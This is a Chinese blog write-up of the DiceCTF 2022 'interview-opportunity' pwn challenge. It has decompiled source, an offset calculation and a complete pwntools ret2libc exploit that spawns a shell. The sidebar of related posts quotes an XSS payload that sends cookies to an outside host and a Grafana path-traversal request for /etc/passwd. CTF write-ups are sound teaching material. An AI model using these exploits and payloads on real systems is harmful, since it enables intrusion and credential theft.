[DiceCTF 2022] interview-opportunity

最新推荐文章于 2022-11-30 23:44:45 发布
最新推荐文章于 2022-11-30 23:44:45 发布
阅读量516 收藏 1
点赞数
分类专栏: PWN 文章标签: linux pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/122790308
版权

前言

2022年打的第一场CTF, 不过也主要是划水, 有常规的题目也有比较进阶的
之前想复现来着, 结果在忙别的事一直拖了三个月…
比赛网址: https://ctf.dicega.ng/
CTFtime WP: https://ctftime.org/event/1541/tasks/

这道题本身很简单, 不过赛后看了国外师傅的blog令我眼前一亮, pwntools的ROP类提供find_gadget()函数来自动找gadget, 为此我还特地去读了下pwntools源码, 还去翻了翻github提交历史, 发现这个功能2017年前就有了, 但是感觉没多少人用?

所以来学习一下, 有这种函数就可以把ROPgadget给扔了(大概

在这里插入图片描述

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[10]; // [rsp+6h] [rbp-1Ah] BYREF
  const char **v5; // [rsp+10h] [rbp-10h]
  int v6; // [rsp+1Ch] [rbp-4h]

  v6 = argc;
  v5 = argv;
  env_setup(argc, argv, envp);
  printf(
    "Thank you for you interest in applying to DiceGang. We need great pwners like you to continue our traditions and com"
    "petition against perfect blue.\n");
  printf("So tell us. Why should you join DiceGang?\n");
  read(0, buf, 0x46uLL);
  puts("Hello: ");
  puts(buf);
  return 0;
}

比较常规的栈溢出, 泄露libc, ret2libc

另外这个题的offset不是反编译看到的距离, 需要调试确定, 不过也可以用脚本自动化确定
在这里插入图片描述
在这里插入图片描述这里offset有个坑
注意buf没有按size_t对齐, 估计是编译的时候改了设置, 正确计算是0x7fffffffdf08 - 0x7fffffffdee6 = 0x22

或者脚本, 但是系统设置不同可能不出corefile

def find_offset():
	io = process('./interview-opportunity')
	payload = cyclic(512)
	io.sendline(payload)
	io.wait() # wait for crash

	crash_pattern = io.corefile.read(io.corefile.sp, 4)
	# print(crash_pattern)
	offset = cyclic_find(crash_pattern)
	return offset

print('offset = ', find_offset())

EXP

from pwn import *

filename = "./interview-opportunity"
elf = ELF(filename)
rop = ROP(elf)
libc = ELF("./libc.so.6")

context.log_level = "debug"
io = process(filename)

def B():
    gdb.attach(io)
    pause()
    
lf = lambda addrstring, address: log.info('{}: %#x'.format(addrstring), address)

def pwn():
    puts_plt = elf.plt['puts']
    puts_got = elf.got['puts']
    main_addr = elf.sym['main']
    pop_rdi_addr = rop.find_gadget(['pop rdi', 'ret'])[0]
    ret_addr = rop.find_gadget(['ret'])[0]
    
    offset = 0x22
    payload = cyclic(offset) + p64(pop_rdi_addr) + p64(puts_got)
    payload += p64(puts_plt) + p64(main_addr)
    io.sendlineafter('?', payload)
    puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    lf('puts address', puts_addr)

    libc.address = puts_addr - libc.sym['puts']
    system_addr = libc.sym['system'] 
    binsh_addr = next(libc.search(b'/bin/sh'))
    payload = cyclic(offset) + p64(pop_rdi_addr) + p64(binsh_addr)
    payload += p64(system_addr) + p64(main_addr)
    io.sendlineafter('?', payload)
    

if __name__ == "__main__":
    pwn()
    io.interactive()

在这里插入图片描述

fa1c4
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DiceGame:骰子游戏
02-20
DiceGame:骰子游戏
interview-2020
03-07
2020年访谈
D - Dice Game (BFS)
weixin_34279061的博客
02-26 190
A dice is a small cube, with each side having a different number of spots on it, ranging from 1 to 6. Each side in the dice has 4 adjacent sides that can be reached by rotating the dice (i.e. the cur...
聊一聊Swift协议
weixin_33736649的博客
05-23 114
协议 协议定义了适合特定任务或功能块的方法、属性和其他需求的蓝图。然后,类、结构或枚举可以采用该协议来提供这些需求的实际实现。任何满足协议要求的类型都被称为符合该协议。 除了指定符合类型必须实现的需求之外,您还可以扩展协议来实现其中的一些需求,或者实现符合类型可以利用的其他功能。 协议的语法 定义协议的方式与类、结构和枚举非常类似: protocol SomeProtocol { // p...
DiceCTF - knock-knock
qq_53263789的博客
02-09 172
一道nodejs题目,给了源码和dockerfile,从dockerfile知道nodejs版本为17.4.0,一个pastebin 返回可以进行xss,但是不会返回cookie,所以,审计一下代码 代码逻辑很简单flag在notes[0]位置上,但是由于每个人返回的token不相同,所以想要伪造token切换到id=0看似不可能 可以发现token生成的主要逻辑是依靠两个部分 this.secret = `secret-${crypto.randomUUID}`; 和 return crypto.cr
PWNTOOLS的基本使用
weixin_62675330的博客
02-11 1957
pwntools的基本使用 首先需要 from pwn import * 把 pwntools 导入进来,它同时会把一些系统库给导入进来 本地打的话 p=process('./filename'),远程的话 p=remote('192.168.1.103',10001) p.close() 关闭 发送 payload p.send(payload) 发送 payload p.sendline(payload) 发送 payload,并进行换行(末尾\n) p.sendafter(some_string,
VNCTF2022 web wp
热门推荐
Je3Z的博客
02-13 1万+
GameV4.0 js/data.js下有段FLAG的base64加密 Vk5DVEYlN0JXZWxjb21lX3RvX1ZOQ1RGMjAyMiU3RA== 解码就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 是个xss,没有过滤,前几次一直不行,session解密木得flag,不知道最后怎么又可以了,www <script>window.open('http://ip:7777/'+document.cookie)</script> 然后把ses
ROPgadget - Gadgets finder and auto-roper
核桃树
01-21 4552
Description This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF/PE/Mach-O format on x86, x64, ARM, PowerPC, SPARC and MIPS architectu
Interview-Materials.rar__interview_interview-q
09-19
很全的面试资料,包括c/c++/linux 等等。不用再费劲网上搜了
Cracking-the-Coding-Interview_interview-questions_Help!_
10-04
Crack Tech Interview. Authored to help in Tech interviews
dice-is-you:《 DICE IS YOU》受到DiceCTF 2021的挑战
05-23
骰子就是你 在线尝试: : 概述 该存储库包含Dice的源代码是DiceCTF 2021所面临的挑战。 这项挑战的灵感来自。 该游戏是使用S语言编写的,用C语言编写的自定义引擎构建的。 您需要Emscripten编译器来构建wasm目标。 生成方式: ./build.sh 请参阅以获取级别5的参考z3解决方案。
fe-interview-dojo:前端采访练习
02-16
前端采访道场· 解决编码挑战的简单环境。 表中的内容 堆 基于JavaScript的键入语言 工具 -Node.js和浏览器的测试运行器 本机V8代码覆盖率 静态代码分析 -代码格式化程序 ... 建议使用节点版本管理器(即 ),以便在...
programming-interview-java:面试前保持健康
05-15
Java编程面试 面试前保持健康。 根据A. Aziz撰写的《 Java编程采访的元素》一书中的任务。
2022CTF培训(七)逆向专项练习
sky123博客
11-30 2073
附件下载链接首先是一个迷宫,由于答案不唯一,因此到 dfs 求出所有路径。 求得路径如下: 第二部分加密函数前半段没用后面每次取 4 次 6 比特转成 3 个 8 比特存在 a2 中,猜测是 base64 。 观察 v14 发现是 base64 码表的反向映射,确认是 base64 。因此该部分输入为 第三部分求逆,解得答案为 把所有合法的 flag 交一遍,可得flag为盲猜 FlagActivity 类中的 onClick 方法是打印 flag 的。 将资源导出,搜索 得资源名称 再搜索资源名
XCTF-*CTF2022-Alice系列挑战write up
qq_42940521的博客
04-18 6181
*CTF2022 Alice系列题目write up
VNCTF 2022 web
qq_53263789的博客
02-16 1585
前言 复现一下vnctf GameV4.0 签到 newcalc0 源码 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json()); app.use(express.static("s
*CTF 2022圆满落幕,0ops战队夺冠
Cyberpeace的博客
04-18 457
*CTF 2022圆满落幕,0ops战队夺冠!
[2022-* CTF]-WEB
qq_53142368的博客
06-07 499
这次比赛体验也还行,题目质量出的很高,把wp记录下来 WEB: oh-my-grafana 这个题目考的是grafana任意文件读取漏洞(CVE-2021-43798) 2021年12月6日,国外安全研究人员检测出grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。 读取敏感文件复现poc: /public/plugins/alertlist/../../../../../../../../etc/passwd /public/plugins/alertli
pwntools中fmtstr的使用
fa1c4的blog
02-01 3398
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
grokking-the-system-design-interview.pdf
最新发布
07-07
### 回答1: 《深入理解系统设计面试》是一本非常有用的系统设计面试指南。该指南深入讲解了系统设计的关键概念、原则和最佳实践。它适用于那些准备参加系统设计面试或想要提高系统设计技能的人群。 这本指南分为两部分。第一部分主要介绍了系统设计的基本概念和术语。它解释了系统设计面试的常见问题类型,并提供了解决这些问题的方法和技巧。此外,该指南还详细介绍了常用的系统设计模式和架构,让读者能够更好地理解和应用这些概念。 第二部分是一系列实际的面试问题和解答。这些问题覆盖了各种不同的系统设计场景,包括分布式系统、缓存、数据库设计、消息队列等等。每个问题都提供了详细的解答和相应的讨论,读者可以从中学习到如何有效地分析问题、提出解决方案以及权衡不同的设计选择。 整本书的风格非常实用和易懂。它通过清晰的说明、图表和示例来解释概念,让读者能够更好地理解和掌握内容。此外,每个问题都有详细的解答和讨论,帮助读者深入思考和理解系统设计的各个方面。 总之,《深入理解系统设计面试》是一本非常有价值的系统设计指南。它提供了全面的知识和实践经验,帮助读者掌握系统设计的核心概念和技巧,从而在面试或实际工作中取得成功。无论你是准备参加系统设计面试还是提升个人技能,这本书都会对你有很大的帮助。 ### 回答2: 《Grokking the System Design Interview》是一本关于系统设计面试的书籍,旨在帮助读者掌握系统设计的技巧和策略。这本书通过详细的案例分析和解答常见面试问题的方法,帮助读者建立起解决复杂系统设计问题的能力。 这本书首先介绍了系统设计面试的背景和重要性,强调了良好的系统设计能力在面试中的价值。然后,书中逐步介绍了解决系统设计问题的一般方法和步骤,包括需求分析、整体设计、数据库设计、缓存设计、分布式系统设计等方面。 《Grokking the System Design Interview》的亮点在于它通过真实世界的案例分析来解释不同的系统设计问题和解决方法。每个案例都包含了问题背景、需求、约束条件和解决方案。通过阅读这些案例,读者可以了解不同类型问题的思考方式和解决方案,并能够将这些方法应用到自己的系统设计问题中。 此外,书中还提供了一些常用的设计方案和优化技巧的讨论,例如使用缓存来提高系统性能、使用负载均衡来增加系统可扩展性等。这些技巧对于读者在面试中展示自己的技术能力和解决问题的能力非常有帮助。 总而言之,《Grokking the System Design Interview》是一本系统全面的系统设计面试指南,通过案例分析和实践经验,帮助读者掌握系统设计的核心原则和技巧。阅读这本书可以帮助读者在系统设计面试中脱颖而出,并取得成功。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值